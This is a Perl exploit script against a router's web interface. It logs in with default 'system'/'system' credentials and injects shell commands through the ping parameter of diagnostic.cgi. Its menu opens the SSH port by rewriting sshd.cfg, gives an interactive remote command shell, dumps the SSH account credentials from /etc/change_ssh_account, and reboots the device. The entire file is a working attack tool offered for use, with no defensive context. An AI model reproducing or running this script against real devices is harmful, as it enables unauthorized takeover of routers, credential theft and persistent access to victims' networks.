exploit.pl

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use URI::Escape;

#Variables Initilizing
my ($RouterIP,$username,$password) = ($ARGV[0],"system","system");

unless ($ARGV[0] || $RouterIP) {
	print "Enter router\'s IP Address: ";
	chomp($RouterIP = <STDIN>);
}

my $ua = new LWP::UserAgent;

$ua->cookie_jar({}); #Cookie storage

my $url = "http://$RouterIP/cgi-bin/login.cgi?
login_id=".uri_escape($username)."&login_pw=".uri_escape($password)."
&langSelection=english&action=Apply&time_sync=2015+3+16&
local_time=date+031621302015"; 
$url =~ s/\n//g;
$url =~ s/\r//g;
my $res = $ua->get($url); #Authentication

die "Failed to login: ".$res->status_line."\n" if (!$res->is_success);
print "Successfully Logged in!\n";

print q{Options to do:
1-UnFilter SSH Port (Router would be rebooted)
2-Run OS Commands throught web
3-See the ssh account credentials
4-Reboot
:};
chomp(my $opt = getc STDIN);
if (int($opt) == 1) {
	$url = "http://$RouterIP/cgi-bin/diagnostic.cgi?select_mode_ping=on
	&ping_ipaddr=0.0.0.0+-c+1%3B+
	echo+SSHD_ENABLE%3D1+%3E%2Fetc%2Fsncfg%2Fsshd.cfg%3B
	+echo+SSHD_PORT%3D4565+%3E%3E%2Fetc%2Fsncfg%2Fsshd.cfg
	+%23&ping_count=4&trace_ipaddr=&trace_max_ttl=6&trace_qoeries_num=3&
	trace_report_only_hidden=0&action=Apply&html_view=ping";
	$url =~ s/\n//g;
	$url =~ s/\r//g;
	$res = $ua->get($url);
	die "Failed: ".$res->status_line."\n" if (!$res->is_success);
	print "UnFilter command sent. Please Reboot the router.\n";
}
elsif (int($opt) == 2) {
	while (chomp(my $cmd = <STDIN>)) {
	        $url = "http://$RouterIP/cgi-bin/diagnostic.cgi?select_mode_ping=on
	        &ping_ipaddr=0.0.0.0+-c+1%3B+
	        ".uri_escape($cmd)."
	        +%23&ping_count=4&trace_ipaddr=&trace_max_ttl=6&trace_qoeries_num=3&
	        trace_report_only_hidden=0&action=Apply&html_view=ping";
	        $url =~ s/\n//g;
	        $url =~ s/\r//g;
		my $res = $ua->get($url);
		die "Failed: ".$res->status_line."\n" if (!$res->is_success);
		my @contents = split(/\n/,$res->content);
		my $cres = "";
		my $i = 1;
		foreach (@contents) {
			if (! /Content-type:\stext\/html/i) {
				$cres .= $_."\n" if ($i > 3);
				$i++;
			}
			else {
				last;
			}
		}
		print $cres."\$ ";
	}
}
elsif (int($opt) == 3) {
        $url = "http://$RouterIP/cgi-bin/diagnostic.cgi?select_mode_ping=on
        &ping_ipaddr=0.0.0.0+-c+1%3B+
        cat%20%2fetc%2fchange_ssh_account
        +%23&ping_count=4&trace_ipaddr=&trace_max_ttl=6&trace_qoeries_num=3&
        trace_report_only_hidden=0&action=Apply&html_view=ping";
        $url =~ s/\n//g;
        $url =~ s/\r//g;
        $res = $ua->get($url);
        die "Failed: ".$res->status_line."\n" if (!$res->is_success);
        my @contents = split(/\n/,$res->content);
        my $cres = "";
        my $i = 1;
        foreach (@contents) {
        	if (! /Content-type:\stext\/html/i) {
        		$cres .= $_."\n" if ($i > 3);
        		$i++;
         	}
        	else {
        		last;
                }
         }
         print $cres;
}
elsif (int($opt) == 4) {
        $url = "http://$RouterIP/cgi-bin/reboot.cgi?
select_option_value=default_reboot&reboot_option=on&action=Apply";
        $url =~ s/\n//g;
        $url =~ s/\r//g;
        $res = $ua->get($url);
        die "Failed: ".$res->status_line."\n" if (!$res->is_success);
	print "Reboot command sent.\n";
}
else {
	die "Bad option.\n";
}

exit 0;